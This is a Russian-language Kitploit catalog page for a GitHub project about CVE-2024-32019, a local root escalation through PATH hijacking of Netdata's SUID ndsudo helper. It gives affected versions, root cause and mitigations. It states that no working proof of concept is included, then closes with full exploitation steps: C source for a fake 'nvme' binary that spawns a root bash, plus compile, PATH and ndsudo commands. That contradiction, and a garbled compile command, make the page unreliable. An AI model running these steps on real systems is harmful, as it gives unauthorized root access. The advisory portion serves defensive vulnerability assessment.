Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Оборонительные ИнструментыПовышение привилегийАнализ уязвимостейЭксплуатацияВиртуализация для безопасностиТестирование на Проникновение
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Проверяет подверженность повышению привилегий через SUID PATH в Netdata ndsudo для CVE-2024-32019 и проверяет наличие исправлений без использования эксплойтов.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-32019 — Локальное повышение привилегий в Netdata ndsudo

Краткое описание

Вспомогательная утилита Netdata ndsudo (устанавливается с setuid root) ограничивает набор команд, которые она будет выполнять, но разрешает эти команды, используя PATH вызывающего. В уязвимых версиях локальный пользователь может разместить вредоносный бинарный файл раньше в PATH, и ndsudo выполнит его с привилегиями root. Исправлено в Netdata 1.45.3 и 1.45.0-169.

Уязвимые / Исправленные версии

  • Уязвимы: >= 1.44.0-60, < 1.45.0-169 и (согласно официальному уведомлению).

>= 1.45.0, < 1.45.3
  • Исправлено: 1.45.3 (стабильная), 1.45.0-169 (nightly). GitHub

  • Воздействие

    Локальное повышение привилегий до root в системах, где ndsudo установлен с SUID и пользователь может его вызвать (обычно члены группы netdata). NVDGitHub

    Первопричина (на высоком уровне)

    • ndsudo имеет SUID-root и разрешает подкоманды, такие как nvme-list, nvme-smart-log и т. д.

    • Он вызывает внешние исполняемые файлы по имени (например, nvme), которые разрешаются через PATH вместо использования абсолютных путей или безопасного фиксированного поиска.

    • Если каталог с правом записи оказывается перед системными путями, злоумышленник может подложить похожий бинарный файл, который будет выполнен с правами root. GitHub

    Безопасное воспроизведение / Проверка

    Этот репозиторий включает проверки без эксплуатации, которые:

    • Проверяют /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (или где бы он ни был установлен) на наличие SUID/владельца.

    • Перечисляют PATH на предмет каталогов с правом записи, расположенных раньше стандартных системных путей.

    • Подтверждают наличие разрешённых имён подкоманд, которые ndsudo может попытаться выполнить.

    • Опционально запускают ndsudo --test <subcommand> для вывода разрешённой команды без её выполнения (использовать с осторожностью, сначала прочитайте код). GitHub

    ⚠️ Никакого боевого PoC не включено. Этот проект предназначен для защитников и исследователей, чтобы оценить подверженность и проверить исправления ответственно.

    Меры защиты

    • Обновите Netdata до 1.45.3 (стабильная) или 1.45.0-169 (nightly).

    • В качестве дополнительной меры защиты предпочитайте абсолютные пути или очищенный минимальный PATH в SUID-утилитах; избегайте предоставления ненужного доступа к ndsudo. GitHubwiz.io

    Шаги эксплуатации

    1. Сохраните следующий код на C как nvme.c:
    root@kitploit:~
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    
    2. Скомпилируйте эксплойт
    root@kitploit:~
    gcc nvme.c - nvme
    
    3. Настройка окружения
    root@kitploit:~
    mkdir -p /tmp/fakebin
    mv nvme /tmp/fakebin/
    chmod +x /tmp/fakebin/nvme
    
    4. Измените PATH
    root@kitploit:~
    export PATH=/tmp/fakebin:$PATH
    
    5. Команда эксплуатации
    root@kitploit:~
    /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

    Ссылки

    • NVD: CVE-2024-32019. NVD

    • Уведомление Netdata (GHSA-pmhq-4cxq-wj93). GitHub

    • Сводка Wiz. wiz.io

    • Статья Snyk. Vulnerability Guide

    • Список MITRE/CVE. CVE

    Скачать инструмент